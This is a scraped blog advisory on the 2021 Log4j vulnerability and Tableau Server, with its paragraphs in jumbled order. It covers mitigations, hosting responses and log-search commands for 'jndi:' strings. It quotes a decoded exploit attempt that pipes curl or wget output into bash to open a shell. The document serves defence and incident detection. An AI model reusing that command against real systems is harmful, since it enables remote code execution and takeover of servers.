![]() ![]() When a maintenance release with a fix becomes available it is important to make sure you’re in a good position to safely deploy the update in your environments. ![]() Tableau will release a maintenance patch with a fix – what can I do to prepare? The hosting provider we use doesn’t use any Java products for logging. None of the open-source products we offer through our Github page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected. What about The Information Lab Tableau Extensions? We deploy using a blue/green approach, so will spin up new infrastructure, from scratch, and restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure. Once a patch is released we will be coordinating an upgrade program with all our hosted customers to migrate them to the new version as soon as possible. We have also enabled the AWS WAF mitigation described above. We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. The Information Lab hosts Tableau Server for us on AWS – what actions are you taking? We remain vigilant on our environment as always. We’ve investigated our services to ensure that no malicious action was taken and we haven’t found any indicators. If you find results then we recommend shutting down the server and restore a safe backup in a new clean environment.Ī small amount of our internal services were detected vulnerable and we’ve immediately restricted access until patches become available. Note: We’ve masked the actual IPs with in above example Responses will look similar to the following: "GET /?x=$ HTTP/1.1"īase64 decoding the string in the above GET request reveals a genuine exploit attempt to get a bash terminal on the server: (curl -s :5874/:80||wget -q -O- :5874/:80)|bash Linux grep 'jndi:' – include '*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs Windows findstr /S /L /M /I /C jndi C:\ProgramData\Tableau\Tableau Server\data\tabsvc\logs\*.log You can scan your Tableau Server logfiles for potential breaches using the following commands: Please consult with your security operations team for guidance. ![]() Please note that we can not guarantee that the following commands will find all breaches as the attacks are still evolving, nor can we guarantee that all breaches found are malicious (they might be scans from security tools). We recommend to upgrade as soon as Tableau releases a patch. We recommend to upgrade as soon as Tableau releases a patch and to be vigilant when opening untrusted files. We recommend to upgrade as soon as Tableau releases a patch and to be vigilant when opening untrusted workbooks. ![]() Upgrade your environment as soon as Tableau releases a patch.Īs Tableau Online is a SaaS solution we recommend monitoring the official announcements from Tableau/Salesforce on this as they will take the necessary steps to keep the environment safe. Your server could be vulnerable for targeted and chained attacks if an attack can be launched from within your trusted network. We recommend monitoring your network and to discuss further risks with your security operations team. Upgrade your environment as soon as Tableau releases a patch. Discuss further risks of targeted or chained attacks from within your trusted network with your security operations team. We recommend restricting access to these servers from the internet until a patch is made available by Tableau. Monitor official announcements from Tableau/Salesforce on this page: The vulnerability condition is enabled by all versions below 2.15 and must be manually disabled in software code if not patched to version 2.15.The vulnerability condition is disabled by default in version 2.15 and up but still possible.Log4J is a Java package used in many software applications for generating log files and is also used by Tableau.Īny software product that runs the Log4J2 package On December 10th, 2021 our SecOps team became aware of a zero-day Java vulnerability in Log4J2 allowing for remote code execution on the host and the potential for loss of control of the system. The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers. | Jonathan Allenby Apache Log4j Vulnerability and Tableau ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |